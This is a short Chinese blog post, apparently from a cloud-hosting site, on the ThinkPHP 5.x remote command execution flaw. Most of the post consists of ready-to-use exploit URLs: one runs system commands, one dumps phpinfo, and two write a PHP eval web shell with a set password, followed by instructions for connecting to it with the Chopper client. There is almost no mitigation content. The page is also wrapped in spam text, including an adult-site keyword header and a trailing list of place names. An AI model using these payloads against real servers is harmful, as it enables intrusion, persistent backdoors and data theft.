中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

thinkphp_5x_命令執行漏洞的示例分析

發布時間:2021-03-10 09:52:45 來源:億速云 閱讀:161 作者:小新 欄目:編程語言

這篇文章主要介紹thinkphp_5x_命令執行漏洞的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

thinkphp_5x_命令執行漏洞

受影響版本包括5.0和5.1版本

docker漏洞環境源碼:
https://github.com/vulnspy/thinkphp-5.1.29
本地環境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函數遠程命令執行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通過phpinfo函數寫出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

寫入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>

使用菜刀連接
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php   密碼為zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php        密碼為zane

以上是“thinkphp_5x_命令執行漏洞的示例分析”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

杂多县| 洪江市| 六盘水市| 汝南县| 神农架林区| 蚌埠市| 扶余县| 保德县| 临安市| 曲沃县| 黔西| 澄城县| 灵山县| 同江市| 万全县| 乌鲁木齐县| 西昌市| 哈尔滨市| 海淀区| 綦江县| 南召县| 玉田县| 祁东县| 桃园市| 延吉市| 简阳市| 大田县| 鄂伦春自治旗| 开鲁县| 开江县| 乐昌市| 广元市| 东港市| 赣州市| 通山县| 大庆市| 城市| 邵阳县| 堆龙德庆县| 开平市| 弋阳县|